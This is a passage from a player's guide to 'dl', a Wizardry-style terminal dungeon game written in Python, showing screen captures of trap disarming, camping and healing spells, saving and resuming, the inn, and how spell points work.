|^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| * o)pen k)antei i)nspect d)isarm        |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^|   l)eave alone                          |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| Option?  > i                            |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| Who? - # or l)eave > 4                  |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| It is poison needle.                    |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| * o)pen k)antei i)nspect d)isarm        |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^|   l)eave alone                          |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| Option?  >                              |^^^^^^^^^^^^^^^^^^^^^^\n\nDia the thief identified the trap as "poison needle". To disarm it, you need to type the trap name accurately.\n\n ^^^^^^^^^^^^^^| * o)pen k)antei i)nspect d)isarm        |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^|   l)eave alone                          |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| Option?  
> d |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| Who? - # or l)eave > 4                  |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| * Trap name?                            |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| > poison needle                         |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| Disarmed the trap.                      |^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^| * There was no interesting item.        |^^^^^^^^^^^^^^^^^^^^^^\n\nHe disarmed the poison needle trap and opened the chest. Unfortunately, there was nothing interesting in it this time.\n\nHere's the trap list.\n\n<table border="2" cellspacing="0" cellpadding="6" rules="groups" frame="hsides">\n\n\n<colgroup>\n<col class="org-left" />\n\n<col class="org-left" />\n</colgroup>\n<thead>\n<tr>\n<th scope="col" class="org-left">trap</th>\n<th scope="col" class="org-left">effect</th>\n</tr>\n</thead>\n\n<tbody>\n<tr>\n<td class="org-left">poison needle</td>\n<td class="org-left">poisons the member who tried to identify/disarm</td>\n</tr>\n\n\n<tr>\n<td class="org-left">crossbow bolt</td>\n<td class="org-left">inflicts damage to a random member</td>\n</tr>\n\n\n<tr>\n<td class="org-left">stunner</td>\n<td class="org-left">paralyzes the member who tried to identify/disarm</td>\n</tr>\n\n\n<tr>\n<td class="org-left">exploding box</td>\n<td class="org-left">inflicts damage to the entire party</td>\n</tr>\n\n\n<tr>\n<td class="org-left">gas bomb</td>\n<td class="org-left">poisons the entire party</td>\n</tr>\n\n\n<tr>\n<td class="org-left">mage blaster</td>\n<td class="org-left">paralyzes members who use mage spells</td>\n</tr>\n\n\n<tr>\n<td class="org-left">priest blaster</td>\n<td class="org-left">paralyzes members who use priest spells</td>\n</tr>\n\n\n<tr>\n<td class="org-left">teleporter</td>\n<td class="org-left">teleports party to a random location (could be in rock)</td>\n</tr>\n\n\n<tr>\n<td class="org-left">alarm</td>\n<td class="org-left">summons nearby monsters</td>\n</tr>\n</tbody>\n</table>\n\n\n<a id="orgb3c2450"></a>\n\n### Friendly monsters\n\nSometimes, you encounter a friendly monster party. You can choose either to leave (`y`) or to fight anyway (`n`). In DL, random alignment reversal is not implemented, so you can freely walk away or fight without any penalties.\n\n ^^^^^^^^^| 1) 5 orcs (5)                                  |^^^^^^^^^^^^^\n ^^^^^^^^^|                                                |^^^^^^^^^^^^^\n ^^^^^^^^^|                                                |^^^^^^^^^^^^^\n ^^^^^^^^^|                                                |^^^^^^^^^^^^^\n ^^^^^^^^^^^^#.....#^^^^#....#^^^^^########^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^| * You encountered friendly orcs.               |^^^^^^^^^^^^^\n ^^^^^^^^^|   Leave? (y/n) >                               |^^^^^^^^^^^^^\n\nOf course, you will get no e.p. or gold if you choose to walk away.\n\n   4 dia        N-THI   10    7 OK      ^* *** encounter ***                  ^\n   5 emily      G-PRI   10   13 OK      ^  Each survivor gets 0 e.p.          ^\n   6 faun       G-MAG   10    7 OK      ^  Each survivor gets 0 gold.         ^\n\n\n<a id="org8827640"></a>\n\n### Get out of the Dungeon\n\n    daemon lord - dl - [maze] floor:?? (???/???) 
#####.#^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.........#.......#^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.........#......+#######^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.........#......#,.....#^^^^^^^^^^#########\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^###.#########.####......#^^^^^^^^^^#........\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^###.###^^#.......#......#^^^^^^^^^^#........\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^#.......#......#^^^^^^^^^^#........\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^#.........++.###^^^^^^^^^^#........\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#..@..#^^#.......####.#^^^^^^^^###########.#\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^#.......#^^#.#^^^^^^^^#...###,....#\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^###.###^^#########^^#.#^^^^^^^^#............\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.#^^^^^^^^^^^^^^^#.#^^^^^^^^#...###.....#\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^###.###^^^^^^^^^^^^^#.#^^^^^^^^#...#^#######\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^^^######^^^#.#^^^^^^#####.#####^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^^^#....#^^^#.#^^^^^^#....,....#^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^^^#....#####.########.........#^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....######....+.+.+.+......+.........#####\n   # name       class   ac   hp status .* north                               .\n   1 ab         G-FIG    4   13 OK      #* north                              #\n   2 ben        G-FIG    4    7 OK      ^* east                               ^\n   3 cam        G-FIG    4    5 OK      ^* east                               ^\n   4 dia        N-THI   10    7 OK      ^* north                              ^\n   5 emily      G-PRI   10   13 OK      ^* north                              ^\n   6 faun       G-MAG   10    7 OK      ^  Exit from dungeon? (y/n) >         ^\n\nWe have walked around a lot on this floor; now the mage's MP is exhausted and some members are injured. Let's get back to the outside world. `<` is the upstairs to the outside. Answer `y` to the question: "Exit from dungeon? (y/n)"\n\n    daemon lord - dl - [edge_of_town] floor:?? (???/???)                        \n                                                                                \n                                                                                \n                                                                                \n \t | * *** Edge of Town ***                    | \n \t | m)aze                                     | \n \t | t)raining grounds                         | \n \t | c)astle                                   | \n \t | S)ave and quit game                       | \n \t | R)esume from saved data                   | \n \t | Command? >                                | \n \t |                                           | \n \t |                                           | \n \t |                                           | \n                                                                                \n                                                                                \n                                                                                \n   # name       class   ac   hp status  * east                                 \n   1 ab         G-FIG    4   13 OK       * north                               \n   2 ben        G-FIG    4    7 OK       * north                               \n   3 cam        G-FIG    4    5 OK       * south                               \n   4 dia        N-THI   10    7 OK       * west                                \n   5 emily      G-PRI   10   13 OK       * west                                \n   6 faun       G-MAG   10    7 OK         Exit from dungeon? (y/n) > y        \n\nThe party is back at Edge of Town. It may take a while to get used to the brightness, but they are safe again!\n\n\n<a id="orgf859d65"></a>\n\n### A new dungeon!\n\n&#x2026; but wait, you should have healed injuries before getting out! No worries. You can go back to the dungeon with `m)aze` again. Let's go back.\n\n    daemon lord - dl - [maze] floor:?? (???/???) 
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^...^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^.@.^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^...^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n # name class ac hp status ^* east ^\n 1 ab G-FIG 4 13 OK ^* north ^\n 2 ben G-FIG 4 7 OK ^* north ^\n 3 cam G-FIG 4 5 OK ^* south ^\n 4 dia N-THI 10 7 OK ^* west ^\n 5 emily G-PRI 10 13 OK ^* west ^\n 6 faun G-MAG 10 7 OK ^ Exit from dungeon? (y/n) > y ^\n\nWhat? We can only see 3x3 tiles around the party. Where has the map data gone? Actually, they are in a different dungeon map. Due to some magical power, dungeon maps are regenerated every time the party comes to the dungeon. Let's walk around a little to confirm the theory.\n\n daemon lord - dl - [maze] floor:?? (???/???) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^##+###^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#....+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^##+.##^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^...@#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^..<.#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#####^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nSee the map is different this time?\n\n\n<a id=\"org3bdba13\"></a>\n\n### Camp\n\nAnyway, type `c` key for camping. 
The camp menu opens.\n\n daemon lord - dl - [camp] floor: 1 ( 1/ 1) <identify> <light> ^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^| * *** Camp *** |^^^^^^^^^^^^\n ^^^^^^^^^^| i)nspect |^^^^^^^^^^^^\n ^^^^^^^^^^| r)eorder party |^^^^^^^^^^^^\n ^^^^^^^^^^| h)eal all members |^^^^^^^^^^^^\n ^^^^^^^^^^| p)rep for adventure |^^^^^^^^^^^^\n ^^^^^^^^^^| S)ave and quit game |^^^^^^^^^^^^\n ^^^^^^^^^^| l)eave |^^^^^^^^^^^^\n ^^^^^^^^^^| Command? > |^^^^^^^^^^^^\n\nAt camp, you can `i)nspect` characters, `r)eorder party`, `h)eal all members`, `p)rep for adventure` or `S)ave and quit game` . Choose `i)nspect` for spells.\n\n daemon lord - dl - [camp] floor:?? (???/???) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^| ab L 1 g-fig dwarf |^^^^^^\n ^^^^^^^^^^| |^^^^^^\n ^^^^^^^^^^| strength 18 gold 21 lvl 1 |^^^^^^\n ^^^^^^^^^^| i.q. 7 e.p. 183 rip 0 |^^^^^^\n ^^^^^^^^^^| piety 10 next 1000 a.c. 4 |^^^^^^\n ^^^^^^^^^^| vitality 13 marks 2 |^^^^^^\n ^^^^^^^^^^| agility 11 h.p. 13/ 13 |^^^^^^\n ^^^^^^^^^^| luck 8 status OK |^^^^^^\n ^^^^^^^^^^| |^^^^^^\n ^^^^^^^^^^| mage 0/0/0/0/0/0/0 priest 0/0/0/0/0/0/0/ |^^^^^^\n ^^^^^^^^^^| 1) *long sword 2) *chain mail |^^^^^^\n ^^^^^^^^^^| 3) *large shield 4) |^^^^^^\n ^^^^^^^^^^| 5) 6) |^^^^^^\n ^^^^^^^^^^| 7) 8) |^^^^^^\n ^^^^^^^^^^| |^^^^^^\n ^^^^^^^^^^| i)tems s)pells jk)change member l)leave > |^^^^^^\n # name | | ^\n 1 ab G-FIG 4 13 OK ^* south ^\n 2 ben G-FIG 4 7 OK ^* *** encounter *** ^\n 3 cam G-FIG 4 5 OK ^ Each survivor gets 0 e.p. ^\n 4 dia N-THI 10 7 OK ^ Each survivor gets 0 gold. ^\n 5 emily G-PRI 10 13 OK ^* south ^\n 6 faun G-MAG 10 7 OK ^* south ^\n\nIt shows the info of the front member Ab. You can change the member shown with `j, k` keys.\n\n ^^^^^^^^^^| emily L 1 g-pri gnome |^^^^^^\n ^^^^^^^^^^| |^^^^^^\n ^^^^^^^^^^| strength 7 gold 21 lvl 1 |^^^^^^\n ^^^^^^^^^^| i.q. 7 e.p. 183 rip 0 |^^^^^^\n ^^^^^^^^^^| piety 18 next 1050 a.c. 10 |^^^^^^\n ^^^^^^^^^^| vitality 13 marks 0 |^^^^^^\n ^^^^^^^^^^| agility 14 h.p. 13/ 13 |^^^^^^\n ^^^^^^^^^^| luck 7 status OK |^^^^^^\n ^^^^^^^^^^| |^^^^^^\n ^^^^^^^^^^| mage 0/0/0/0/0/0/0 priest 2/0/0/0/0/0/0/ |^^^^^^\n ^^^^^^^^^^| 1) *sling 2) |^^^^^^\n ^^^^^^^^^^| 3) 4) |^^^^^^\n ^^^^^^^^^^| 5) 6) |^^^^^^\n ^^^^^^^^^^| 7) 8) |^^^^^^\n ^^^^^^^^^^| |^^^^^^\n ^^^^^^^^^^| i)tems s)pells jk)change member l)leave > |^^^^^^\n\nEmily is a priest and can cast healing spells. Type `s)pells` > `c)ast spell` and type \"jiai\" which heals HP of a member.\n\n ^^^^^^^^^^| emily L 1 g-pri gnome |^^^^^^\n ^^^^^^^^^^| |^^^^^^\n ^^^^^^^^^^| strength 7 gold 21 lvl 1 |^^^^^^\n ^^^^^^^^^^| | * Spell memu: | 0 |^^^^^^\n ^^^^^^^^^^| | c)ast spell v)iew list l)eave > c | 10 |^^^^^^\n ^^^^^^^^^^| | * What spell to cast? | |^^^^^^\n ^^^^^^^^^^| | > jiai | |^^^^^^\n ^^^^^^^^^^| | Who? - # or l)eave > 2 | |^^^^^^\n ^^^^^^^^^^| | emily started casting jiai | |^^^^^^\n ^^^^^^^^^^| | ben's HP was fully restored. |0/ |^^^^^^\n ^^^^^^^^^^| | * Spell memu: | |^^^^^^\n ^^^^^^^^^^| | c)ast spell v)iew list l)eave > | |^^^^^^\n\nLooks like, Ben's HP is fully restored. Do the same for Cam.\n\n ^^^^^^^^^^| | ben's HP was fully restored. | |^^^^^^\n ^^^^^^^^^^| | * Spell memu: | |^^^^^^\n ^^^^^^^^^^| | c)ast spell v)iew list l)eave > c | |^^^^^^\n ^^^^^^^^^^| | * What spell to cast? | |^^^^^^\n ^^^^^^^^^^| | > jiai |0/ |^^^^^^\n ^^^^^^^^^^| | Who? - # or l)eave > 3 | |^^^^^^\n ^^^^^^^^^^| | emily started casting jiai | |^^^^^^\n ^^^^^^^^^^| | cam's HP was fully restored. 
|                                               |^^^^^^\n\nGreat!\n\n\n<a id="org70c73a4"></a>\n\n### Heal all members\n\nBefore you get out of the dungeon, you usually heal (ie, recover HP) all party members. And this can become a bit of a hassle over time.\n\nThe `h)eal all members` option at camp can save you that hassle. If you choose the option, the program automatically casts heal spells on party members until either everyone is at full HP or MPs are exhausted.\n\n    daemon lord - dl - [camp] floor: 6 ( 63/ 21) <identify> <light> #####.......+.^^^^^\n ^^^^^^^^^^| * *** Camp ***                                |##...##^^^^^\n ^^^^^^^^^^| i)nspect                                      |#######^^^^^\n ^^^^^^^^^^| r)eorder party                                |#^^^^^^^^^^^\n ^^^^^^^^^^| h)eal all members                             |#^^^^^^^^^^^\n ^^^^^^^^^^| S)ave and quit game                           |#^^^^^^^^^^^\n ^^^^^^^^^^| l)eave                                        |#^^^^^^^^^^^\n ^^^^^^^^^^| Command? > h                                  |##^^^^^^^^^^\n ^^^^^^^^^^| * ed casted zenjiai                           |##^^^^^^^^^^\n ^^^^^^^^^^|   4 HP was restored to andy.                  |##^^^^^^^^^^\n ^^^^^^^^^^|   5 HP was restored to bean.                  |########^^^^\n ^^^^^^^^^^|   7 HP was restored to cammy.                 |########^^^^\n ^^^^^^^^^^|   dexie's HP was fully restored.              |......##^^^^\n ^^^^^^^^^^|   5 HP was restored to ed.                    |#####.##^^^^\n ^^^^^^^^^^|   fun's HP was fully restored.                |#####.##^^^^\n\nNote that this option doesn't cure status anomalies such as being paralyzed or even ashed. Also, the algorithm is not very smart.\n\n\n<a id="orge4f1380"></a>\n\n### Prep for adventure\n\nThis is also an automatic-spell-cast option. Right after you go into the dungeon, you'll need some preparation. Namely, casting 'hogo', 'shikibetsu', 'gps' and 'hikarinotama', which can become a little hassle in the long run. The `p)rep for adventure` option automatically casts these spells. That is, if the party can cast them.\n\n    daemon lord - dl - [camp] floor: 1 (  1/  1) <identify> <light> ^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^| * *** Camp ***                                |^^^^^^^^^^^^\n ^^^^^^^^^^| i)nspect                                      |^^^^^^^^^^^^\n ^^^^^^^^^^| r)eorder party                                |^^^^^^^^^^^^\n ^^^^^^^^^^| h)eal all members                             |^^^^^^^^^^^^\n ^^^^^^^^^^| p)rep for adventure                           |^^^^^^^^^^^^\n ^^^^^^^^^^| S)ave and quit game                           |^^^^^^^^^^^^\n ^^^^^^^^^^| l)eave                                        |^^^^^^^^^^^^\n ^^^^^^^^^^| Command? > p                                  |^^^^^^^^^^^^\n ^^^^^^^^^^| * ed casted hogo                              |^^^^^^^^^^^^\n ^^^^^^^^^^| * ed casted shikibetsu                        |^^^^^^^^^^^^\n ^^^^^^^^^^| * fun casted gps                              |^^^^^^^^^^^^\n ^^^^^^^^^^| * ed casted hikarinotama                      |^^^^^^^^^^^^\n\n\n<a id="orgdeabb28"></a>\n\n### Save and Resume from camp\n\nNow, try to save and resume in the dungeon. From the camp menu, choose `S)ave and quit game` .\n\n ^^^^^^^^^^| * *** Camp ***                                |^^^^^^\n ^^^^^^^^^^| i)nspect                                      |^^^^^^\n ^^^^^^^^^^| r)eorder party                                |^^^^^^\n ^^^^^^^^^^| S)ave and quit game                           |^^^^^^\n ^^^^^^^^^^| l)eave                                        |^^^^^^\n ^^^^^^^^^^| Command? > S                                  |^^^^^^\n ^^^^^^^^^^| * Thank you for playing.                      |^^^^^^\n ^^^^^^^^^^| * See you again soon.                         |^^^^^^\n ^^^^^^^^^^|                                               |^^^^^^\n\nAnd run the python script.\n\n    $ python dl.py\n\nChoose `e)dge of town` > `R)esume from saved data`\n\n     | * *** Edge of Town ***                    | \n     | m)aze                                     | \n     | t)raining grounds                         | \n     | c)astle                                   | \n     | S)ave and quit game                       | \n     | R)esume from saved data                   | \n     | Command? >                                | \n\nAnd, you are in the dungeon again.\n\n    daemon lord - dl - [maze] floor:?? (???/???) 
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^##+###^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#....+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^##+.##^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^...@#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^..<.#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#####^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n # name class ac hp status ^ ^\n 1 ab G-FIG 4 13 OK ^ ^\n 2 ben G-FIG 4 12 OK ^ ^\n 3 cam G-FIG 4 10 OK ^ ^\n 4 dia N-THI 10 7 OK ^ ^\n 5 emily G-PRI 10 13 OK ^ ^\n 6 faun G-MAG 10 7 OK ^ ^\n\nLet's exit from the dungeon and head to Edge of Town > Castle > Lakehouse Inn for some rest.\n\n\n<a id=\"orged946f6\"></a>\n\n## Castle\n\n\n<a id=\"org78054aa\"></a>\n\n### The Lakehouse Inn\n\n | * *** Castle *** | \n | h)awthorne tavern | \n | t)rader jay's | \n | i)lakehouse inn | \n | m)oss general hospital | \n | e)dge of town | \n | Command? > | \n\nBack at Castle, type `i` for Lakehouse Inn.\n\n | * *** The Lakehouse Inn *** | \n | Welcome. You must be very tired. | \n | You have 232 gold in total. | \n | c)ots 12 gold | \n | s)tandard rooms 120 gold | \n | d)elux rooms 300 gold | \n | v)lake view suites 1200 gold | \n | p)residential suites 3000 gold | \n | or l)eave | \n | Which rooms to stay today? > | \n\nDelux room sounds good, but as we have only 232 gold, let's choose `c)ots` tonight. Maybe we can stay in standard rooms tomorrow.\n\n | Which rooms to stay today? > c | \n | * Today's dinner is cabbage soup. | \n | * ab went to bed... | \n | * ben went to bed... | \n | * cam went to bed... | \n | * dia went to bed... | \n | * emily went to bed... | \n | * faun went to bed... | \n\nMagic points are fully restored regardless of the room they choose. HPs being restored depend on the room they stay. More comfortable (and thus expensive) rooms will heal them better. Dinner is better in those rooms as well.\n\nIf their e.p. reach the next level, their level will go up while they are asleep at the inn.\n\nIn DL, age doesn't matter. They can stay at the inn as long as they wish without getting old. All the party members stay at the same room type.\n\n\n<a id=\"org00dea26\"></a>\n\n# Spells\n\n\n<a id=\"org37d2ec2\"></a>\n\n## Overview\n\nAs in Wizardry, spells in DL are divided into two categories: mage spells and priest spells. Very roughly speaking, mage spells are for battles with monsters and priest spells are to heal and cure.\n\nThere are magic points (MPs) for each category and spell level. 
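\n\nYou can picture each character's MP pool as two arrays of seven counters, one per spell level. A rough illustration (hypothetical code, not dl's actual implementation):\n\n    # Hypothetical sketch: per-level MPs, rendered like 'mage 2/0/0/0/0/0/0'.\n    MAX_MP = 9  # cap for each spell level\n\n    class SpellPoints:\n        def __init__(self):\n            self.mage = [0] * 7    # index 0 holds spell level 1\n            self.priest = [0] * 7\n\n        def show(self, kind):\n            return '/'.join(str(n) for n in getattr(self, kind))\n\n        def cast(self, kind, level):\n            pool = getattr(self, kind)\n            if pool[level - 1] <= 0:\n                return False   # no MP left at this spell level\n            pool[level - 1] -= 1\n            return True\n\n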
You can check their remaining MPs in the character inspection window.\n\n ^^^^^^^^^^|   luck      11    status   OK                 |^^^^^^\n ^^^^^^^^^^|                                               |^^^^^^\n ^^^^^^^^^^|  mage  2/0/0/0/0/0/0   priest 0/0/0/0/0/0/0/  |^^^^^^\n ^^^^^^^^^^|   1)                   2)                     |^^^^^^\n ^^^^^^^^^^|   3)                   4)                     |^^^^^^\n\nIn this example, she has 2 MPs remaining for level 1 mage spells. She will acquire more MPs as her level goes up.\n\nThe maximum MP for each spell level is 9. A high level mage/priest will have `9/9/9/9/9/9/9` MPs.\n\n\n<a id="org31faaf3"></a>\n\n## Usage\n\nSpells can be used only in the dungeon. More specifically, during a battle or while the party is camping. The only exception is "kantei", which can also be used for identifying a chest trap.\n\nSome spells such as mage's "shunmin" or "taika" can be used only in battles. Some other spells such as mage's "gps" or "tsubasa" are only available while camping.\n\nTo use spells from the camp menu, first `i)nspect` the character who should cast the spell. To change characters in the inspect menu, use the `j, k` keys until it shows the member to cast the spell. Then, type `s)pells` > `c)ast spell` > enter the spell name (> choose the target member).\n\n    daemon lord - dl - [camp] floor:?? (???/???) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^|  faun       L  1 g-mag  elf                   |^^^^^^\n ^^^^^^^^^^|                                               |^^^^^^\n ^^^^^^^^^^|  strength  7    gold    100    lvl   1        |^^^^^^\n ^^^^^^^^^^|  | * Spell memu:                      | 0     |^^^^^^\n ^^^^^^^^^^|  | c)ast spell v)iew list l)eave > c  | 10    |^^^^^^\n ^^^^^^^^^^|  | * What spell to cast?              |       |^^^^^^\n ^^^^^^^^^^|  | > gps                              |       |^^^^^^\n ^^^^^^^^^^|  |                                    |       |^^^^^^\n ^^^^^^^^^^|  |                                    |       |^^^^^^\n ^^^^^^^^^^|  |                                    |0/     |^^^^^^\n ^^^^^^^^^^|  |                                    |       |^^^^^^\n ^^^^^^^^^^|  |                                    |       |^^^^^^\n 